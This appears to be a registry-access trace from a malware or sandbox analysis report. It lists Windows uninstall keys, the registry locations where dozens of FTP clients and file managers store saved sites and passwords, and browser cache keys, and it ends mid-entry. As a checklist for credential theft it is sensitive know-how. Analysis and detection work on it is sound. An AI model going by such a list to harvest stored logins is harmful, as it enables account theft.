HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2608539
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2608539\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2689322
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2689322\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2723430
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2723430\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2821701
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2821701\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2845370
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2845370\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2890375
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2890375\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{23daf363-3020-4059-b3ae-dc4ad39fed19}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{23daf363-3020-4059-b3ae-dc4ad39fed19}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{23daf363-3020-4059-b3ae-dc4ad39fed19}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83216022FF}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83216022FF}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83216022FF}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83218074F0}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83218074F0}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83218074F0}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3ee5e5bb-b7cc-4556-8861-a00a82977d6c}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{3ee5e5bb-b7cc-4556-8861-a00a82977d6c}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{3ee5e5bb-b7cc-4556-8861-a00a82977d6c}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5ECE64C9-F5B3-4914-B1F2-23D46548B7E3}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5ECE64C9-F5B3-4914-B1F2-23D46548B7E3}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5ECE64C9-F5B3-4914-B1F2-23D46548B7E3}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{65AD78AD-D23D-3A1E-9305-3AE65CD522C2}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{65AD78AD-D23D-3A1E-9305-3AE65CD522C2}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{65AD78AD-D23D-3A1E-9305-3AE65CD522C2}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB3122661
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB3122661\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB3127233
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB3127233\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AB0000000001}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AB0000000001}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AB0000000001}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E2B51919-207A-43EB-AE78-733F9C6797C2}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E2B51919-207A-43EB-AE78-733F9C6797C2}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E2B51919-207A-43EB-AE78-733F9C6797C2}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2608539
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2608539\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2689322
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2689322\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2723430
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2723430\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2821701
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2821701\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2845370
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2845370\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2890375
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2890375\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f65db027-aff3-4070-886a-0d87064aabb1}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f65db027-aff3-4070-886a-0d87064aabb1}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f65db027-aff3-4070-886a-0d87064aabb1}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}\DisplayName
HKEY_CURRENT_USER\Software\WinRAR
HKEY_CURRENT_USER\Software\WinRAR\HWID
HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Far Manager\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Far\SavedDialogHistory\FTPHost
HKEY_CURRENT_USER\Software\Far2\SavedDialogHistory\FTPHost
HKEY_CURRENT_USER\Software\Far Manager\SavedDialogHistory\FTPHost
HKEY_CURRENT_USER\Software\Ghisler\Windows Commander
HKEY_LOCAL_MACHINE\Software\Ghisler\Windows Commander
HKEY_CURRENT_USER\Software\Ghisler\Total Commander
HKEY_LOCAL_MACHINE\Software\Ghisler\Total Commander
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 9\QCToolbar
HKEY_CURRENT_USER\Software\FlashFXP\3
HKEY_CURRENT_USER\Software\FlashFXP
HKEY_CURRENT_USER\Software\FlashFXP\4
HKEY_LOCAL_MACHINE\Software\FlashFXP\3
HKEY_LOCAL_MACHINE\Software\FlashFXP
HKEY_LOCAL_MACHINE\Software\FlashFXP\4
HKEY_CURRENT_USER\Software\FileZilla
HKEY_CURRENT_USER\Software\FileZilla Client
HKEY_LOCAL_MACHINE\Software\FileZilla
HKEY_LOCAL_MACHINE\Software\FileZilla Client
HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP\Main
HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client\Main
HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP\Options
HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client\Options
HKEY_CURRENT_USER\Software\BPFTP
HKEY_CURRENT_USER\Software\TurboFTP
HKEY_LOCAL_MACHINE\Software\TurboFTP
HKEY_CURRENT_USER\Software\Sota\FFFTP
HKEY_CURRENT_USER\Software\Sota\FFFTP\Options
HKEY_CURRENT_USER\Software\CoffeeCup Software\Internet\Profiles
HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites
HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
HKEY_CURRENT_USER\Software\FTP Explorer\Profiles
HKEY_CURRENT_USER\Software\VanDyke\SecureFX
HKEY_CURRENT_USER\Software\Cryer\WebSitePublisher
HKEY_CURRENT_USER\Software\ExpanDrive\Sessions
HKEY_CURRENT_USER\Software\ExpanDrive
HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\SOFTWARE\NCH Software\Fling\Accounts
HKEY_LOCAL_MACHINE\SOFTWARE\NCH Software\Fling\Accounts
HKEY_CURRENT_USER\Software\FTPClient\Sites
HKEY_LOCAL_MACHINE\Software\FTPClient\Sites
HKEY_CURRENT_USER\Software\SoftX.org\FTPClient\Sites
HKEY_LOCAL_MACHINE\Software\SoftX.org\FTPClient\Sites
HKEY_CURRENT_USER\SOFTWARE\LeapWare
HKEY_LOCAL_MACHINE\SOFTWARE\LeapWare
HKEY_CURRENT_USER\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\Software\Martin Prikryl
HKEY_CURRENT_USER\Software\South River Technologies\WebDrive\Connections
HKEY_LOCAL_MACHINE\Software\South River Technologies\WebDrive\Connections
HKEY_CURRENT_USER\Software\Opera Software
HKEY_CLASSES_ROOT\Opera.HTML\shell\open\command
HKEY_CURRENT_USER\Software\AceBIT
HKEY_LOCAL_MACHINE\Software\AceBIT
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
HKEY_CURRENT_USER\Software\Mozilla
HKEY_LOCAL_MACHINE\Software\Mozilla
HKEY_CURRENT_USER\Software\LeechFTP
HKEY_CLASSES_ROOT\CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Signature
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:
